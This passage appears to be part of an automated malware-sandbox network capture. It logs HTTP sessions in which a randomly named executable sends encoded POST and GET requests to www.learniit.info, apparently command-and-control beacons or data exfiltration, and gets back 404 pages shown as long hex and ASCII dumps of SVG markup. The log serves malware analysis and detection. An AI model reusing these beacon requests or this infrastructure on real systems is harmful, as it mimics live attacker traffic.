                                                                                                            Dec 12, 2024 10:21:47.642283916 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                                                            Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                                                            Dec 12, 2024 10:21:47.642306089 CET896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                                                                            Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                                                                            Dec 12, 2024 10:21:47.642324924 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                                                                            Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                                                                            Dec 12, 2024 10:21:47.642342091 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                                                                            Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                                                                            Dec 12, 2024 10:21:47.642359972 CET448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                                                                            Dec 12, 2024 10:21:47.642565966 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                                                                            Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                                                                            Dec 12, 2024 10:21:47.642585039 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                                                            Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                                                                            Dec 12, 2024 10:21:47.763082981 CET1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                                                                            Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.2249181203.161.42.73801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:21:49.089282036 CET2472OUTPOST /n8su/ HTTP/1.1
                                                                                                            Host: www.learniit.info
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.learniit.info
                                                                                                            Referer: http://www.learniit.info/n8su/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 6f 48 35 61 4d 31 6a 6b 68 64 55 6a 62 74 67 6e 52 51 44 44 47 56 34 70 36 59 4a 68 6b 67 7a 30 70 5a 46 76 6f 37 34 2b 7a 4c 33 6a 41 32 57 44 44 71 6b 79 6f 48 78 30 47 4e 59 38 2f 42 49 73 63 65 31 64 76 51 62 5a 66 2f 47 4f 2b 75 6e 64 7a 42 75 71 54 39 38 42 70 6f 33 68 61 35 6c 4b 6e 69 41 43 43 45 55 75 44 71 37 45 33 65 79 64 6c 73 44 66 56 78 66 35 6c 36 4f 4d 4a 69 53 7a 5a 71 74 76 54 36 62 65 64 76 6d 64 37 57 51 6a 77 72 55 30 51 37 4c 51 48 71 46 6c 79 4d 6a 6c 70 57 65 79 6a 71 4e 73 52 2f 71 79 2b 7a 6d 30 4c 47 63 33 33 59 2f 49 34 33 4c 55 74 78 56 59 78 68 67 6c 68 71 49 66 57 61 62 4c 42 45 59 74 36 74 4b 32 62 74 50 55 67 6e 57 4d 43 2f 77 44 69 36 69 5a 42 48 5a 36 76 76 36 4d 62 31 53 5a 63 41 42 43 54 7a 39 6e 66 70 43 69 4c 76 6b 62 47 4e 4a 65 32 55 77 68 76 31 4f 68 51 66 32 58 35 54 4e 32 55 48 54 52 52 64 30 61 50 57 68 4f 52 5a 45 54 5a 33 77 62 6b 63 79 74 52 30 68 58 75 42 33 52 44 56 31 71 71 63 6b 69 49 6f 2f 70 42 6c 45 33 44 4f 75 62 5a 59 59 68 53 51 6a [TRUNCATED]
                                                                                                            Data Ascii: x4=oH5aM1jkhdUjbtgnRQDDGV4p6YJhkgz0pZFvo74+zL3jA2WDDqkyoHx0GNY8/BIsce1dvQbZf/GO+undzBuqT98Bpo3ha5lKniACCEUuDq7E3eydlsDfVxf5l6OMJiSzZqtvT6bedvmd7WQjwrU0Q7LQHqFlyMjlpWeyjqNsR/qy+zm0LGc33Y/I43LUtxVYxhglhqIfWabLBEYt6tK2btPUgnWMC/wDi6iZBHZ6vv6Mb1SZcABCTz9nfpCiLvkbGNJe2Uwhv1OhQf2X5TN2UHTRRd0aPWhORZETZ3wbkcytR0hXuB3RDV1qqckiIo/pBlE3DOubZYYhSQjSoiAn86aXrS90UvMJRJeVqix8pVw/aH0zWLe9ZLyD75K2nNqoNsr6fkevORi6cP7Tnxby/+E6fvPywtJ2SSFP+pbaOhOWA0zKeXfQQXFnQ1HWKgBVBn6yzb3FVNRj6vvz0e5W7/JHhZ+tKnzNedrhPVW03Zlc1bt2TDPhBX5A6XTRLZseSWKuXTCw4dAC4sPnoUT9LaUtpaMhjJP2/j6ObYKoPwffexrVukm/6lZQ+xoh3TyT3nnPY4dSYPJ5zr0CgetuJd+vZ8MowElSsziy4lsrKQ8gPqcL+v50ecZEh+vxFvk2UUPsKSBas/8u8tf5znGbzD0cjJV61BgXDf2CyefW4ujjTY0JwZll79CQO1oWMJUjZjzMMTSFmfF2d5jM8riq1mJKNKIhwYTyt03+elyhy7Vh2t6GkrK0tP2u4BvyQolJUbxL91GWDYsFL43LLSKrmvgzQ4SuugAUSAsutRTKYAz//xFxw2Al3lrYUS+TxLCMtsK7T5McMTjFQ+qd5I+X/w+1Ey7cIuev5jnMsvhMNG4RNEJEKKeVpFv5JC//WiA0QJ5x1lMCv4H+ihC7rKgeEqKiCGgLoPcN4emzPou2vgv30L1moMICXq7TkblI/AG7X9SFau/9VTYAgoHdP6zV5Zy7waLMBYesAfUh9Iihja6R82ONn [TRUNCATED]
                                                                                                            Dec 12, 2024 10:21:49.211359024 CET1761OUTData Raw: 71 56 49 6e 48 2b 4d 48 70 6a 53 74 65 39 75 4b 46 32 4c 66 6c 39 34 47 76 58 34 66 65 2b 41 6f 51 2b 4c 50 37 2b 74 35 41 62 66 49 6c 74 76 46 30 70 38 79 39 54 49 69 71 34 78 71 34 7a 45 6d 7a 6a 46 51 4f 74 53 77 58 70 33 4b 51 75 58 30 4f 52
                                                                                                            Data Ascii: qVInH+MHpjSte9uKF2Lfl94GvX4fe+AoQ+LP7+t5AbfIltvF0p8y9TIiq4xq4zEmzjFQOtSwXp3KQuX0ORn2LVQ1rHwV2SI+4KIitSviL2EJmP9YTG9ucFgubSMX84WGiYud/h9G3BxLibOxKh6loK/V2Rgi1BOxWU1u9K8l3e0XIShjYfhbR79uP3jGFGjcyd9fi9z5iaBMW19jn96xgLf8c6T4z/ssj6MwU0fl84Ot6/0HyQB
                                                                                                            Dec 12, 2024 10:21:50.341052055 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:21:50 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 16052
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                                            Dec 12, 2024 10:21:50.341111898 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                                                            Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                                                            Dec 12, 2024 10:21:50.341154099 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                                                            Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                                                            Dec 12, 2024 10:21:50.341224909 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                                                            Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                                                            Dec 12, 2024 10:21:50.341259956 CET896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                                                                            Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                                                                            Dec 12, 2024 10:21:50.341382980 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                                                                            Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                                                                            Dec 12, 2024 10:21:50.341414928 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                                                                            Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                                                                            Dec 12, 2024 10:21:50.341496944 CET448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                                                                            Dec 12, 2024 10:21:50.341548920 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                                                                            Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                                                                            Dec 12, 2024 10:21:50.341692924 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                                                            Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.2.2249182203.161.42.73801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:21:51.741799116 CET542OUTGET /n8su/?e2E=wRQ8oHXx&x4=lFR6PBva/PMsONRXI0WwK0wAlPs3/3LGo4dEt9E07rmpJDSADrt1oQ5wEpxa5wprSOBn2CzJO8jS1Mfo/039O8MFhYDOYZlyw2UFRkURX7D2yJawivbRUB3rqqzd HTTP/1.1
                                                                                                            Host: www.learniit.info
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:21:52.962450981 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:21:52 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 16052
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                                            Dec 12, 2024 10:21:52.962537050 CET1236INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                                                                                            Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                                                                            Dec 12, 2024 10:21:52.962574959 CET1236INData Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                                                                                                            Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                                                                                                            Dec 12, 2024 10:21:52.962610006 CET1236INData Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                                                                                                            Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
                                                                                                            Dec 12, 2024 10:21:52.962645054 CET896INData Raw: 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32
                                                                                                            Data Ascii: 8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000
                                                                                                            Dec 12, 2024 10:21:52.962680101 CET1236INData Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e
                                                                                                            Data Ascii: ke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.6665
                                                                                                            Dec 12, 2024 10:21:52.962714911 CET1236INData Raw: 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e
                                                                                                            Data Ascii: 021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.00342
                                                                                                            Dec 12, 2024 10:21:52.962749958 CET448INData Raw: 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30
                                                                                                            Data Ascii: 00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.232
                                                                                                            Dec 12, 2024 10:21:52.963001013 CET1236INData Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
                                                                                                            Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
